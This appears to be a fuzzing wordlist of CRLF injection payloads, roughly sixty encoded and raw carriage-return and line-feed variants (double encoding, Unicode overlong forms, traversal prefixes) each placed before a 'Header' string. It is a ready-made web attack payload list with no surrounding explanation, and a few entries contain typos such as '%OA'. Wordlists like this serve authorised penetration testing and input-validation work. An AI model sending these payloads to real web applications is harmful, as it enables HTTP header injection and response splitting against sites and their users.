%0AHeader
%0A%20Header
%20%0AHeader
%23%OAHeader
%E5%98%8A%E5%98%8DHeader
%E5%98%8A%E5%98%8D%0AHeader
%3F%0AHeader
crlf%0AHeader
crlf%0A%20Header
crlf%20%0AHeader
crlf%23%OAHeader
crlf%E5%98%8A%E5%98%8DHeader
crlf%E5%98%8A%E5%98%8D%0AHeader
crlf%3F%0AHeader
%0DHeader
%0D%20Header
%20%0DHeader
%23%0DHeader
%23%0AHeader
%E5%98%8A%E5%98%8DHeader
%E5%98%8A%E5%98%8D%0DHeader
%3F%0DHeader
crlf%0DHeader
crlf%0D%20Header
crlf%20%0DHeader
crlf%23%0DHeader
crlf%23%0AHeader
crlf%E5%98%8A%E5%98%8DHeader
crlf%E5%98%8A%E5%98%8D%0DHeader
crlf%3F%0DHeader
%0D%0AHeader
%0D%0A%20Header
%20%0D%0AHeader
%23%0D%0AHeader
\r\nHeader
 \r\n Header
\r\n Header
%5cr%5cnHeader
%E5%98%8A%E5%98%8DHeader
%E5%98%8A%E5%98%8D%0D%0AHeader
%3F%0D%0AHeader
crlf%0D%0AHeader
crlf%0D%0A%20Header
crlf%20%0D%0AHeader
crlf%23%0D%0AHeader
crlf\r\nHeader
crlf%5cr%5cnHeader
crlf%E5%98%8A%E5%98%8DHeader
crlf%E5%98%8A%E5%98%8D%0D%0AHeader
crlf%3F%0D%0AHeader
%0D%0A%09Header
crlf%0D%0A%09Header
%250AHeader
%25250AHeader
%%0A0AHeader
%25%30AHeader
%25%30%61Header
%u000AHeader
%2F%2E%2E%0D%0AHeader
%2E%2E%2F%0D%0AHeader
%2F..%0D%0AHeader